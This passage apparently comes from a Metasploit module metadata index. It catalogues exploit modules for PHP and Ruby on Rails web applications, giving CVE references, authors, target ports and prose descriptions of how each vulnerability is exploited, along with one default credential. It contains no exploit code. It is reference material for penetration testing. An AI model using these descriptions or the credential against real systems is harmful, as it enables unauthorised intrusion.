"disclosure_date": "2015-12-08",
"type": "exploit",
"author": [
"WICS",
"Jay Turla"
],
"description": "This module exploits a remote code execution vulnerability in PHP Utility Belt,\n which is a set of tools for PHP developers and should not be installed in a\n production environment, since this application runs arbitrary PHP code as an\n intended functionality.",
"references": [
"EDB-38901",
"URL-https://github.com/mboynes/php-utility-belt"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP Utility Belt"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/php_utility_belt_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/php_utility_belt_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/php_volunteer_upload_exec": {
"name": "PHP Volunteer Management System v1.0.2 Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/php_volunteer_upload_exec",
"rank": 600,
"disclosure_date": "2012-05-28",
"type": "exploit",
"author": [
"Ashoo <ashoo.online@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in PHP Volunteer Management System,\n version v1.0.2 or prior. This application has an upload feature that allows an\n authenticated user to upload anything to the 'uploads' directory, which is actually\n reachable by anyone without a credential. An attacker can easily abuse this upload\n functionality first by logging in with the default credential (admin:volunteer),\n upload a malicious payload, and then execute it by sending another GET request.",
"references": [
"OSVDB-82391",
"EDB-18941"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP Volunteer Management 1.0.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/php_volunteer_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/php_volunteer_upload_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/phpfilemanager_rce": {
"name": "phpFileManager 0.9.8 Remote Code Execution",
"full_name": "exploit/multi/http/phpfilemanager_rce",
"rank": 600,
"disclosure_date": "2015-08-28",
"type": "exploit",
"author": [
"hyp3rlinx",
"Jay Turla"
],
"description": "This module exploits a remote code execution vulnerability in phpFileManager\n 0.9.8 which is a filesystem management tool on a single file.",
"references": [
"CVE-2015-5958",
"EDB-37709",
"URL-http://phpfm.sourceforge.net/"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"phpFileManager / Unix",
"phpFileManager / Windows"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/phpfilemanager_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/phpfilemanager_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phpldapadmin_query_engine": {
"name": "phpLDAPadmin query_engine Remote PHP Code Injection",
"full_name": "exploit/multi/http/phpldapadmin_query_engine",
"rank": 600,
"disclosure_date": "2011-10-24",
"type": "exploit",
"author": [
"EgiX <n0b0d13s@gmail.com>",
"mr_me <steventhomasseeley@gmail.com>",
"TecR0c <roccogiovannicalvi@gmail.com >"
],
"description": "This module exploits a vulnerability in the lib/functions.php for\n phpLDAPadmin versions 1.2.1.1 and earlier that allows attackers input\n parsed directly to the create_function() php function. A patch was\n issued that uses a whitelist regex expression to check the user supplied\n input before being parsed to the create_function() call.",
"references": [
"CVE-2011-4075",
"OSVDB-76594",
"BID-50331",
"EDB-18021"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/phpldapadmin_query_engine.rb",
"is_install_path": true,
"ref_name": "multi/http/phpldapadmin_query_engine",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phpmailer_arg_injection": {
"name": "PHPMailer Sendmail Argument Injection",
"full_name": "exploit/multi/http/phpmailer_arg_injection",
"rank": 0,
"disclosure_date": "2016-12-26",
"type": "exploit",
"author": [
"Dawid Golunski",
"Spencer McIntyre"
],
"description": "PHPMailer versions up to and including 5.2.19 are affected by a\n vulnerability which can be leveraged by an attacker to write a file with\n partially controlled contents to an arbitrary location through injection\n of arguments that are passed to the sendmail binary. This module\n writes a payload to the web root of the webserver before then executing\n it with an HTTP request. The user running PHPMailer must have write\n access to the specified WEB_ROOT directory and successful exploitation\n can take a few minutes.",
"references": [
"CVE-2016-10033",
"CVE-2016-10045",
"EDB-40968",
"EDB-40969",
"URL-https://github.com/opsxcq/exploit-CVE-2016-10033",
"URL-https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHPMailer <5.2.18",
"PHPMailer 5.2.18 - 5.2.19"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/multi/http/phpmailer_arg_injection.rb",
"is_install_path": true,
"ref_name": "multi/http/phpmailer_arg_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_multi/http/phpmoadmin_exec": {
"name": "PHPMoAdmin 1.1.2 Remote Code Execution",
"full_name": "exploit/multi/http/phpmoadmin_exec",
"rank": 600,
"disclosure_date": "2015-03-03",
"type": "exploit",
"author": [
"Pichaya Morimoto pichaya <Pichaya Morimoto pichaya@ieee.org>",
"Ricardo Jorge Borges de Almeida <ricardojba1@gmail.com>"
],
"description": "This module exploits an arbitrary PHP command execution vulnerability due to a\n dangerous use of eval() in PHPMoAdmin.",
"references": [
"CVE-2015-2208",
"EDB-36251",
"URL-https://seclists.org/fulldisclosure/2015/Mar/19",
"URL-https://seclists.org/oss-sec/2015/q1/743"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHPMoAdmin"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/phpmoadmin_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/phpmoadmin_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phpmyadmin_3522_backdoor": {
"name": "phpMyAdmin 3.5.2.2 server_sync.php Backdoor",
"full_name": "exploit/multi/http/phpmyadmin_3522_backdoor",
"rank": 300,
"disclosure_date": "2012-09-25",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary code execution backdoor\n placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.",
"references": [
"CVE-2012-5159",
"OSVDB-85739",
"EDB-21834",
"URL-http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb",
"is_install_path": true,
"ref_name": "multi/http/phpmyadmin_3522_backdoor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phpmyadmin_lfi_rce": {
"name": "phpMyAdmin Authenticated Remote Code Execution",
"full_name": "exploit/multi/http/phpmyadmin_lfi_rce",
"rank": 400,
"disclosure_date": "2018-06-19",
"type": "exploit",
"author": [
"ChaMd5",
"Henry Huang",
"Jacob Robles"
],
"description": "phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion,\n which can be exploited post-authentication to execute PHP code by\n application. The module has been tested with phpMyAdmin v4.8.1.",
"references": [
"BID-104532",
"CVE-2018-12613",
"CWE-661",
"URL-https://www.phpmyadmin.net/security/PMASA-2018-4/",
"URL-https://www.secpulse.com/archives/72817.html",
"URL-https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows",
"Linux"
],
"mod_time": "2018-08-24 07:18:24 +0000",
"path": "/modules/exploits/multi/http/phpmyadmin_lfi_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/phpmyadmin_lfi_rce",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/phpmyadmin_null_termination_exec": {
"name": "phpMyAdmin Authenticated Remote Code Execution",
"full_name": "exploit/multi/http/phpmyadmin_null_termination_exec",
"rank": 600,
"disclosure_date": "2016-06-23",
"type": "exploit",
"author": [
"Michal Čihař and Cure53",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "phpMyAdmin 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before\n 4.6.3 does not properly choose delimiters to prevent use of the preg_replace\n (aka eval) modifier, which might allow remote attackers to execute arbitrary\n PHP code via a crafted string, as demonstrated by the table search-and-replace\n implementation.",
"references": [
"BID-91387",
"CVE-2016-5734",
"CWE-661",
"URL-https://www.phpmyadmin.net/security/PMASA-2016-27/",
"URL-https://security.gentoo.org/glsa/201701-32",
"EDB-40185"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-26 04:18:38 +0000",
"path": "/modules/exploits/multi/http/phpmyadmin_null_termination_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/phpmyadmin_null_termination_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/phpmyadmin_preg_replace": {
"name": "phpMyAdmin Authenticated Remote Code Execution via preg_replace()",
"full_name": "exploit/multi/http/phpmyadmin_preg_replace",
"rank": 600,
"disclosure_date": "2013-04-25",
"type": "exploit",
"author": [
"Janek \"waraxe\" Vind",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's\n replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php\n This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3.\n PHP versions > 5.4.6 are not vulnerable.",
"references": [
"CVE-2013-3238",
"PMASA-2013-2",
"waraxe-2013-SA#103",
"EDB-25003",
"OSVDB-92793",
"URL-http://www.waraxe.us/advisory-103.html",
"URL-http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/phpmyadmin_preg_replace.rb",
"is_install_path": true,
"ref_name": "multi/http/phpmyadmin_preg_replace",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/phpscheduleit_start_date": {
"name": "phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection",
"full_name": "exploit/multi/http/phpscheduleit_start_date",
"rank": 600,
"disclosure_date": "2008-10-01",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary PHP code execution flaw in the phpScheduleIt\n software. This vulnerability is only exploitable when the magic_quotes_gpc PHP\n option is 'off'. Authentication is not required to exploit the bug.\n\n Version 1.2.10 and earlier of phpScheduleIt are affected.",
"references": [
"CVE-2008-6132",
"OSVDB-48797",
"BID-31520",
"EDB-6646"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/phpscheduleit_start_date.rb",
"is_install_path": true,
"ref_name": "multi/http/phpscheduleit_start_date",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phptax_exec": {
"name": "PhpTax pfilez Parameter Exec Remote Code Injection",
"full_name": "exploit/multi/http/phptax_exec",
"rank": 600,
"disclosure_date": "2012-10-08",
"type": "exploit",
"author": [
"Jean Pascal Pereira <pereira@secbiz.de>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in PhpTax, an income tax report\n generator. When generating a PDF, the icondrawpng() function in drawimage.php\n does not properly handle the pfilez parameter, which will be used in an exec()\n statement, and then results in arbitrary remote code execution under the context\n of the web server. Please note: authentication is not required to exploit this\n vulnerability.",
"references": [
"OSVDB-86992",
"EDB-21665"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PhpTax 0.8"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/phptax_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/phptax_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phpwiki_ploticus_exec": {
"name": "Phpwiki Ploticus Remote Code Execution",
"full_name": "exploit/multi/http/phpwiki_ploticus_exec",
"rank": 600,
"disclosure_date": "2014-09-11",
"type": "exploit",
"author": [
"Benjamin Harris",
"us3r777 <us3r777@n0b0.so>"
],
"description": "The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary\n code via command injection.",
"references": [
"CVE-2014-5519",
"OSVDB-110576",
"EDB-34451",
"URL-https://sourceforge.net/p/phpwiki/code/8974/?page=1",
"URL-https://seclists.org/fulldisclosure/2014/Aug/77"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/phpwiki_ploticus_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/phpwiki_ploticus_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/pimcore_unserialize_rce": {
"name": "Pimcore Unserialize RCE",
"full_name": "exploit/multi/http/pimcore_unserialize_rce",
"rank": 300,
"disclosure_date": "2019-03-11",
"type": "exploit",
"author": [
"Daniele Scanu",
"Fabio Cogno"
],
"description": "This module exploits a PHP unserialize() in Pimcore before 5.7.1 to\n execute arbitrary code. An authenticated user with \"classes\" permission\n could exploit the vulnerability.\n\n The vulnerability exists in the \"ClassController.php\" class, where the\n \"bulk-commit\" method makes it possible to exploit the unserialize function\n when passing untrusted values in \"data\" parameter.\n\n Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.5.4, 5.6.0-5.6.6 with the Symfony\n unserialize payload.\n\n Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload.",
"references": [
"CVE-2019-10867",
"URL-https://github.com/pimcore/pimcore/commit/38a29e2f4f5f060a73974626952501cee05fda73",
"URL-https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-173998"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Pimcore 5.x (Symfony unserialize payload)",
"Pimcore 4.x (Zend unserialize payload)"
],
"mod_time": "2019-04-29 08:43:33 +0000",
"path": "/modules/exploits/multi/http/pimcore_unserialize_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/pimcore_unserialize_rce",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/playsms_filename_exec": {
"name": "PlaySMS sendfromfile.php Authenticated \"Filename\" Field Code Execution",
"full_name": "exploit/multi/http/playsms_filename_exec",
"rank": 600,
"disclosure_date": "2017-05-21",
"type": "exploit",
"author": [
"Touhid M.Shaikh <touhidshaikh22@gmail.com>",
"DarkS3curity"
],
"description": "This module exploits a code injection vulnerability within an authenticated file\n upload feature in PlaySMS v1.4. This issue is caused by improper file name handling\n in sendfromfile.php file.\n Authenticated Users can upload a file and rename the file with a malicious payload.\n This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.",
"references": [
"EDB-42003",
"CVE-2017-9080",
"URL-https://www.youtube.com/watch?v=MuYoImvfpew",
"URL-http://touhidshaikh.com/blog/?p=336"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PlaySMS 1.4"
],
"mod_time": "2018-05-07 07:26:28 +0000",
"path": "/modules/exploits/multi/http/playsms_filename_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/playsms_filename_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/playsms_uploadcsv_exec": {
"name": "PlaySMS import.php Authenticated CSV File Upload Code Execution",
"full_name": "exploit/multi/http/playsms_uploadcsv_exec",
"rank": 600,
"disclosure_date": "2017-05-21",
"type": "exploit",
"author": [
"Touhid M.Shaikh <touhidshaikh22@gmail.com>"
],
"description": "This module exploits an authenticated file upload remote code excution vulnerability\n in PlaySMS Version 1.4. This issue is caused by improper file contents handling in\n import.php (aka the Phonebook import feature). Authenticated Users can upload a CSV\n file containing a malicious payload via vectors involving the User-Agent HTTP header\n and PHP code in the User-Agent.\n This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.",
"references": [
"CVE-2017-9101",
"URL-https://www.youtube.com/watch?v=KIB9sKQdEwE",
"EDB-42044"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PlaySMS 1.4"
],
"mod_time": "2018-05-07 09:22:21 +0000",
"path": "/modules/exploits/multi/http/playsms_uploadcsv_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/playsms_uploadcsv_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/plone_popen2": {
"name": "Plone and Zope XMLTools Remote Command Execution",
"full_name": "exploit/multi/http/plone_popen2",
"rank": 600,
"disclosure_date": "2011-10-04",
"type": "exploit",
"author": [
"Unknown",
"Nick Miles",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x\n through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute\n arbitrary commands via vectors related to the p_ class in OFS/misc_.py and\n the use of Python modules.",
"references": [
"CVE-2011-3587",
"OSVDB-76105",
"EDB-18262",
"URL-http://plone.org/products/plone/security/advisories/20110928"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/plone_popen2.rb",
"is_install_path": true,
"ref_name": "multi/http/plone_popen2",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/pmwiki_pagelist": {
"name": "PmWiki pagelist.php Remote PHP Code Injection Exploit",
"full_name": "exploit/multi/http/pmwiki_pagelist",
"rank": 600,
"disclosure_date": "2011-11-09",
"type": "exploit",
"author": [
"EgiX",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability\n in PmWiki from 2.0.0 to 2.2.34. The vulnerable function is\n inside /scripts/pagelist.php.",
"references": [
"CVE-2011-4453",
"BID-50776",
"OSVDB-77261",
"EDB-18149",
"URL-http://www.pmwiki.org/wiki/PITS/01271"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/pmwiki_pagelist.rb",
"is_install_path": true,
"ref_name": "multi/http/pmwiki_pagelist",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/polarcms_upload_exec": {
"name": "PolarBear CMS PHP File Upload Vulnerability",
"full_name": "exploit/multi/http/polarcms_upload_exec",
"rank": 600,
"disclosure_date": "2012-01-21",
"type": "exploit",
"author": [
"Fady Mohamed Osman"
],
"description": "This module exploits a file upload vulnerability found in PolarBear CMS\n By abusing the upload.php file, a malicious user can upload a file to a temp\n directory without authentication, which results in arbitrary code execution.",
"references": [
"CVE-2013-0803",
"OSVDB-90627"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/polarcms_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/polarcms_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/processmaker_exec": {
"name": "ProcessMaker Open Source Authenticated PHP Code Execution",
"full_name": "exploit/multi/http/processmaker_exec",
"rank": 600,
"disclosure_date": "2013-10-24",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a PHP code execution vulnerability in the\n 'neoclassic' skin for ProcessMaker Open Source which allows any\n authenticated user to execute PHP code. The vulnerable skin is\n installed by default in version 2.x and cannot be removed via\n the web interface.",
"references": [
"OSVDB-99199",
"BID-63411",
"URL-http://bugs.processmaker.com/view.php?id=13436"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ProcessMaker Open Source 2.x (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/processmaker_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/processmaker_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/processmaker_plugin_upload": {
"name": "ProcessMaker Plugin Upload",
"full_name": "exploit/multi/http/processmaker_plugin_upload",
"rank": 600,
"disclosure_date": "2010-08-25",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module will generate and upload a plugin to ProcessMaker\n resulting in execution of PHP code as the web server user.\n\n Credentials for a valid user account with Administrator roles\n is required to run this module.\n\n This module has been tested successfully on ProcessMaker versions\n 1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0, 3.2.1 on Windows 7 SP 1;\n and version 3.2.0 on Debian Linux 8.",
"references": [
"URL-http://wiki.processmaker.com/3.0/Plugin_Development"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/processmaker_plugin_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/processmaker_plugin_upload",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/qdpm_upload_exec": {
"name": "qdPM v7 Arbitrary PHP File Upload Vulnerability",
"full_name": "exploit/multi/http/qdpm_upload_exec",
"rank": 600,
"disclosure_date": "2012-06-14",
"type": "exploit",
"author": [
"loneferret",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in qdPM - a web-based project management\n software. The user profile's photo upload feature can be abused to upload any\n arbitrary file onto the victim server machine, which allows remote code execution.\n Please note in order to use this module, you must have a valid credential to sign\n in.",
"references": [
"OSVDB-82978",
"EDB-19154"
],
"platform": "Linux,PHP",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/qdpm_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/qdpm_upload_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rails_actionpack_inline_exec": {
"name": "Ruby on Rails ActionPack Inline ERB Code Execution",
"full_name": "exploit/multi/http/rails_actionpack_inline_exec",
"rank": 600,
"disclosure_date": "2016-03-01",
"type": "exploit",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module exploits a remote code execution vulnerability in the\n inline request processor of the Ruby on Rails ActionPack component.\n This vulnerability allows an attacker to process ERB to the inline\n JSON processor, which is then rendered, permitting full RCE within\n the runtime, without logging an error condition.",
"references": [
"CVE-2016-2098"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/rails_actionpack_inline_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/rails_actionpack_inline_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rails_dynamic_render_code_exec": {
"name": "Ruby on Rails Dynamic Render File Upload Remote Code Execution",
"full_name": "exploit/multi/http/rails_dynamic_render_code_exec",
"rank": 600,
"disclosure_date": "2016-10-16",
"type": "exploit",
"author": [
"mr_me <mr_me@offensive-security.com>",
"John Poulin (forced-request)"
],
"description": "This module exploits a remote code execution vulnerability in the explicit render\n method when leveraging user parameters.\n This module has been tested across multiple versions of Ruby on Rails.\n The technique used by this module requires the specified\n endpoint to be using dynamic render paths, such as the following example:\n\n def show\n render params[:id]\n end\n\n Also, the vulnerable target will need a POST endpoint for the TempFile upload, this\n can literally be any endpoint. This module doesnt use the log inclusion method of\n exploitation due to it not being universal enough. Instead, a new code injection\n technique was found and used whereby an attacker can upload temporary image files\n against any POST endpoint and use them for the inclusion attack. Finally, you only\n get one shot at this if you are testing with the builtin rails server, use caution.",
"references": [
"CVE-2016-0752",
"URL-https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00",
"URL-https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/",
"URL-https://gist.github.com/forced-request/5158759a6418e6376afb"
],
"platform": "BSD,Linux",
"arch": "x86",
"rport": 3000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Ruby on Rails 4.0.8 July 2, 2014"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/rails_dynamic_render_code_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rails_json_yaml_code_exec": {
"name": "Ruby on Rails JSON Processor YAML Deserialization Code Execution",
"full_name": "exploit/multi/http/rails_json_yaml_code_exec",
"rank": 600,
"disclosure_date": "2013-01-28",
"type": "exploit",
"author": [
"jjarmoc",
"egypt <egypt@metasploit.com>",
"lian"
],
"description": "This module exploits a remote code execution vulnerability in the\n JSON request processor of the Ruby on Rails application framework.\n This vulnerability allows an attacker to instantiate a remote object,\n which in turn can be used to execute any ruby code remotely in the\n context of the application. This vulnerability is very similar to\n CVE-2013-0156.\n\n This module has been tested successfully on RoR 3.0.9, 3.0.19, and\n 2.3.15.\n\n The technique used by this module requires the target to be running a\n fairly recent version of Ruby 1.9 (since 2011 or so). Applications\n using Ruby 1.8 may still be exploitable using the init_with() method,\n but this has not been demonstrated.",
"references": [
"CVE-2013-0333",
"OSVDB-89594"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/rails_json_yaml_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/rails_json_yaml_code_exec",
"check": false,
"post_auth": false,
